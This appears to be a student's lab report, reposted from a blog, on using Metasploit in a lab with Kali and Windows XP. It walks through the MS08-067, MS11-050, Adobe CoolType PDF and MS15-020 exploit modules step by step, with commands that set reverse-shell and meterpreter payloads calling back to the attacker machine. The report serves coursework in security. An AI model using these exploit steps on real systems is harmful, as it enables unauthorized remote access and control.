20145327 《网络对抗》MSF基础应用

20145327 《网络对抗》MSF基础应用

主动攻击ms08_067

两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)
kali ip地址:192.168.43.54
windows xp sp3 ip地址:192.168.43.56
ping通:
884676-20170414205342033-150189576.png

  • MS08_067远程漏洞攻击实践:Shell
    1.开启msfconsole.

2.输入命令search ms08_067,会显示出找到的渗透模块.
884676-20170414205721423-286578441.png

3.输入命令use exploit/windows/smb/ms08_067_netapi,进入漏洞模块的使用.

4.输入命令show payload会显示出有效的攻击载荷.
884676-20170414210341798-1156403159.png

5.set payload generic/shell_reverse_tcp设置攻击有效载荷.

6.show options显示我们需要在攻击前需要设置的数据.
884676-20170414210755751-716746837.png

7.输入命令set LHOST 192.168.43.54 ;set RHOST 192.168.43.56 show options再次查看payload状态.
884676-20170414211041111-2142873509.png

8.exploit攻击
884676-20170414211350533-173243055.png

在kali上执行ipconfig/all
884676-20170414211535111-2060671078.png

在win xp上执行同样的命令
884676-20170414211751892-882110042.png

  • MS08_067远程漏洞攻击实践:meterpreter
    1.使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。

2.设置payload:set payload windows/meterpreter/reverse_tcp

3.show options,设置的ip地址
884676-20170414213018173-779881380.png

4.exploit攻击
884676-20170414213254798-851005162.png

5.执行ifconfig,查看靶机地址:
884676-20170414213633830-1331224212.png

6.ps查看进程:
884676-20170414213716205-1344727368.png

7.meterpreter转shell:
884676-20170414213815751-1958708629.png

针对浏览器的攻击ms11_050

kali ip地址:192.168.43.54
windows xp ip地址:192.168.43.125
884676-20170414214824955-900382484.png

1.开启msfconsole

2.输入use windows/browser/ms11_050_mshtml_cobjectelement进入该漏洞模块

3.输入info查看信息
884676-20170414215459705-1002822365.png
对应的targets:
884676-20170414215701767-813067383.png

4.设置载荷set payload windows/meterpreter/reverse_tcp
884676-20170414220001314-187044420.png

5.show options查看需要设置的相关信息:
884676-20170414220124095-417266510.png

6.设置相关信息
set LHOST 192.168.43.54 ;set LPORT 5327 ;set URIPATH cc
884676-20170414220713408-1597137685.png
884676-20170414220828423-1419460936.png

7.exploit,有靶机需要访问的ip地址:
884676-20170414220923658-1173795585.png

8.在靶机IE上输入网址,并在靶机上查看信息
884676-20170414221122064-1684517421.png

kali中显示一个session 1已经创建:
884676-20170414221222611-1919563694.png

9.输入命令sessions -i 1,开始连接
884676-20170414221438580-2056806114.png

10.已经攻击成功了,开始按键抓取或者获取shell
884676-20170414221620580-1781315156.png
884676-20170414221702345-1315399790.png

Adobe阅读器渗透攻击

kali ip地址:192.168.43.54
windows xp ip地址:192.168.43.100
884676-20170414222404486-139313722.png

1.开启msfconsole。

2.use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用

3.set payload windows/meterpreter/reverse_tcp设置攻击有效载荷

4.show options
884676-20170414223039486-260227801.png

5.输入命令
set FILENAME gc.pdf ;set LHOST 192.168.43.54 ;set LPORT 5327
再次使用show options,看是否设置成功
884676-20170414223759642-1072575204.png

6.exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里
884676-20170414223906017-172668928.png

7.使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。

8.使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。输入命令set LHOST 192.168.43.54 set LPORT 5327和攻击模块里的数据设置为一样的。
884676-20170414224744689-201282609.png

9.exploit开始攻击,在xp中打开pdf
很无奈 在xp中死活粘不了PDF
884676-20170414233117658-509810758.png
要是能粘上肯定是成功的,摊手与微笑.jpg

成功应用任何一个辅助模块 ms15-020

两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)
kali ip地址:192.168.43.54
windows xp ip地址:192.168.43.125
共享主机win10:192.168.43.64

search ms15 //搜索关键字相关漏洞
884676-20170415000858970-1498864892.png

启动msf msfconsole

漏洞利用模块 use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader

查看漏洞相关信息 info

设置一个反弹shellset payload windows/meterpreter/reverse_tcp
884676-20170415191134330-1217773993.png

show options设置参数
884676-20170415191235361-1398594190.png

设置win10(开着共享)地址 set UNCHOST 192.168.43.64

设置共享文件的文件夹 这里主机192.168.43.64在C盘下的share里文件夹开启了共享 set UNCSHARE share

set LHOST 192.168.43.54
884676-20170415192848048-935782445.png

exploit
884676-20170415193043033-1181759716.png

去生成的目录下把文件拷贝到共享主机的共享文件夹下
这拷贝我真是多灾多难呀
884676-20170415193546095-1712736735.png

所以我尝试开三个虚拟机 希望我的电脑不会炸 微笑.jpg
很绝望 问了小组长负责人学霸都无法解决
884676-20170415194246626-341800467.png

关了不甘心又再试了一次,成功粘了俩 然而文件名过长那个该怎么办
884676-20170415200800298-1392963900.png

实验后回答问题

  • 什么是exploit,payload,encode
    exploit是设置攻击参数发送到靶机
    payload就是一种载荷shellcode包装成文件
    encode是编码

  • 实验总结与体会
    非常感谢课题负责人张亚军小精灵的虚拟机提供,提供很大帮助避免不少麻烦。这次实验的复制粘贴闹了鬼我很是绝望。

转载于:https://www.cnblogs.com/20145327gc/p/6710943.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值